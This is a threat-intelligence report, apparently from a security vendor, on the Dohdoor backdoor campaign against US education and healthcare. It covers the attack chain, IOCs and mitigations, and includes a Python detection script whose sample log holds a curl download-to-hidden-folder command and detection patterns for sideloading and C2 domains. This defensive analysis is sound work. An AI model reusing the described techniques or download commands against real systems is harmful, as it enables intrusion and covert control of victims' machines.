Dohdoor Backdoor Attack: UAT-10027 Targets Windows Systems in U.S. Education and Healthcare Sectors

Executive Summary
The threat actor UAT-10027 has launched a sophisticated cyber campaign targeting the U.S. education and healthcare sectors, deploying a novel backdoor known as Dohdoor. This malware leverages DNS-over-HTTPS (DoH) for covert command-and-control (C2) communications, enabling it to bypass traditional network monitoring and security controls. The campaign, active since at least December 2025, utilizes advanced evasion techniques such as DLL sideloading, process hollowing, and endpoint detection and response (EDR) bypass. Technical analysis suggests a low-confidence attribution to North Korean advanced persistent threat (APT) groups, particularly Lazarus, based on overlapping tactics, techniques, and procedures (TTPs). The campaign’s primary objectives appear to be persistent access, lateral movement, and the deployment of additional payloads, including Cobalt Strike beacons, for post-exploitation activities.
Threat Actor Profile
UAT-10027 is an emerging threat cluster exhibiting operational sophistication and a focus on high-value targets within the U.S. education and healthcare verticals. The group’s tradecraft demonstrates a deep understanding of Windows internals and security controls, as evidenced by their use of living-off-the-land binaries (LOLBins), dynamic API resolution, and anti-forensic measures. While definitive attribution remains elusive, the campaign’s technical overlaps with Lazarus—including custom XOR-SUB decryption routines, DoH-based C2, and process hollowing—suggest a possible North Korean nexus. The group’s victimology also aligns with previous campaigns attributed to Kimsuky (education sector) and Maui ransomware (healthcare sector), further supporting this assessment.
Technical Analysis of Malware/TTPs
The Dohdoor backdoor is delivered via a multi-stage attack chain, beginning with phishing emails containing malicious PowerShell scripts. These scripts retrieve and execute a Windows batch file from a remote server, which in turn downloads a malicious DLL masquerading as a legitimate Windows component (such as propsys.dll or batmeter.dll). The batch script employs DLL sideloading by invoking trusted Windows executables—Fondue.exe, mblctr.exe, and ScreenClippingHost.exe—to load the malicious DLL into memory.
Once executed, Dohdoor performs several anti-forensic actions, including clearing the Run command history, wiping the clipboard, and self-deletion to minimize forensic artifacts. The malware dynamically resolves Windows API functions using hash-based lookups, complicating static analysis and signature-based detection.
For C2 communications, Dohdoor utilizes DoH queries to resolve attacker-controlled domains via Cloudflare’s DNS service. This approach encrypts DNS traffic and blends malicious activity with legitimate HTTPS traffic, effectively bypassing conventional DNS monitoring. The malware establishes HTTPS tunnels to Cloudflare edge nodes, further obfuscating its C2 traffic.
Dohdoor is capable of downloading encrypted secondary payloads—most notably Cobalt Strike beacons—which are injected into legitimate Windows processes using process hollowing. Targeted binaries for injection include OpenWith.exe, wksprt.exe, ImagingDevices.exe, and wab.exe. To evade EDR solutions, Dohdoor unhooks system calls in ntdll.dll, neutralizing user-mode hooks commonly used for behavioral monitoring.
Exploitation in the Wild
The campaign has been observed targeting U.S. education and healthcare organizations, exploiting the widespread use of Windows systems and the prevalence of remote work infrastructure. Initial access is typically achieved through spear-phishing emails containing obfuscated PowerShell downloaders. The attackers leverage LOLBins for DLL sideloading, ensuring that malicious code is executed within the context of trusted system processes. C2 infrastructure is concealed behind Cloudflare, and the use of non-traditional top-level domains (TLDs) with irregular capitalization further complicates detection. Post-exploitation activities include the deployment of Cobalt Strike for lateral movement, credential harvesting, and data exfiltration.
Victimology and Targeting
The primary victims of this campaign are organizations within the U.S. education and healthcare sectors. These industries are attractive targets due to their large attack surfaces, legacy infrastructure, and the sensitive nature of the data they handle. The campaign’s targeting aligns with previous North Korean APT operations, which have historically focused on sectors with valuable intellectual property, personal data, and critical infrastructure. The use of phishing as an initial access vector exploits the high volume of email communication and the often limited cybersecurity awareness among end users in these sectors.
Mitigation and Countermeasures
Organizations are advised to implement a multi-layered defense strategy to mitigate the risk posed by Dohdoor and similar threats. Key recommendations include monitoring for suspicious PowerShell and batch script executions, particularly those that invoke curl.exe to download remote scripts. Network defenders should scrutinize DNS-over-HTTPS traffic, especially outbound connections to Cloudflare with anomalous subdomains or TLDs. Defenders should also deploy and regularly update ClamAV and Snort signatures specific to Dohdoor and its associated artifacts. Endpoint monitoring should focus on detecting process hollowing and DLL sideloading activity within legitimate Windows binaries such as Fondue.exe, mblctr.exe, and ScreenClippingHost.exe.
Threat hunters should proactively search for the provided indicators of compromise (IOCs), including suspicious domains (MswInSofTUpDloAd.OnLiNe, DEEPinSPeCTioNsyStEM.DeSigN), JA3S hash (466556e923186364e82cbdb4cad8df2c), and TLS certificate serial (7FF31977972C224A76155D13B6D685E3). Investigate any use of these IOCs in endpoint and network logs, and pay particular attention to hidden workspace folders in C:\ProgramData or C:\Users\Public and the presence of malicious DLLs named after legitimate Windows components.
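As an added example (not code from the Rescana or Talos write-ups), a small Python triage script that applies the hunting guidance above to constructed Sysmon-style telemetry lines: it flags curl.exe spawned by a script host, a spoofed Windows DLL loaded by one of the named sideloading hosts from outside C:\Windows, DNS queries for the listed domains regardless of capitalization, and hidden folders under C:\ProgramData or C:\Users\Public. The log format, the example.invalid URLs and the file names in the sample are assumptions.

```python
import re

# Constructed sample telemetry (not real logs) in a simple "Type key=value" format.
SAMPLE_LOG = r"""
ProcessCreate parent=powershell.exe image=curl.exe cmdline="curl.exe -s http://example.invalid/u.bat -o C:\ProgramData\.ws\u.bat"
ProcessCreate parent=explorer.exe image=curl.exe cmdline="curl.exe https://www.example.invalid/"
ImageLoad image=mblctr.exe loaded=C:\Users\Public\.cache\propsys.dll
ImageLoad image=mblctr.exe loaded=C:\Windows\System32\propsys.dll
DnsQuery image=ScreenClippingHost.exe query=MswInSofTUpDloAd.OnLiNe
DnsQuery image=chrome.exe query=www.cloudflare.com
"""

# Detection anchors taken from the write-up: IOC domains (compared case-insensitively
# because the actor uses irregular capitalization), sideloading hosts, spoofed DLL names.
IOC_DOMAINS = {"mswinsoftupdload.online", "deepinspectionsystem.design"}
SIDELOAD_HOSTS = {"fondue.exe", "mblctr.exe", "screenclippinghost.exe"}
SPOOFED_DLLS = {"propsys.dll", "batmeter.dll"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe"}
HIDDEN_DIR = re.compile(r"c:\\(programdata|users\\public)\\\.", re.IGNORECASE)
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line):
    """Split one telemetry line into {'type': ..., key: value, ...}."""
    kind, _, rest = line.strip().partition(" ")
    fields = {k: v.strip('"') for k, v in KV.findall(rest)}
    fields["type"] = kind
    return fields

def detect(ev):
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    image = ev.get("image", "").lower()
    if ev["type"] == "ProcessCreate" and image == "curl.exe":
        if ev.get("parent", "").lower() in SCRIPT_HOSTS:
            hits.append("script-spawned curl download")
    if ev["type"] == "ImageLoad" and image in SIDELOAD_HOSTS:
        loaded = ev.get("loaded", "")
        if (loaded.split("\\")[-1].lower() in SPOOFED_DLLS
                and not loaded.lower().startswith("c:\\windows\\")):
            hits.append("DLL sideload from non-system path")
    if ev["type"] == "DnsQuery" and ev.get("query", "").lower().rstrip(".") in IOC_DOMAINS:
        hits.append("known Dohdoor C2 domain")
    if any(HIDDEN_DIR.search(v) for v in ev.values()):
        hits.append("hidden workspace folder")
    return hits

def scan(log_text):
    """Return (line_number, rule) for every log line that trips a rule."""
    return [(n, rule) for n, line in enumerate(log_text.strip().splitlines(), 1)
            for rule in detect(parse_event(line))]
```

The benign lines (curl launched from Explorer, the real propsys.dll from System32, a lookup of www.cloudflare.com) produce no hits, which is the point: the rules key on the combination of parent, path and name rather than on any one of them alone.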
User awareness training should be reinforced to reduce the risk of successful phishing attacks. Organizations should also consider restricting the execution of unsigned scripts and enforcing application whitelisting policies to limit the abuse of LOLBins.
References
Cisco Talos Blog: New Dohdoor malware campaign targets education and health care: https://blog.talosintelligence.com/new-dohdoor-malware-campaign/
The Hacker News: UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor: https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html
Cisco Talos IOCs GitHub Repository: https://github.com/Cisco-Talos/IOCs
MITRE ATT&CK: Lazarus Group: https://attack.mitre.org/groups/G0032/
About Rescana
Rescana empowers organizations to proactively manage third-party cyber risk with our advanced TPRM platform, providing continuous monitoring, automated risk assessments, and actionable intelligence. Our platform enables security teams to identify, prioritize, and mitigate threats across their extended supply chain, ensuring resilience against evolving cyber adversaries. For questions or further information, we are happy to assist at ops@rescana.com.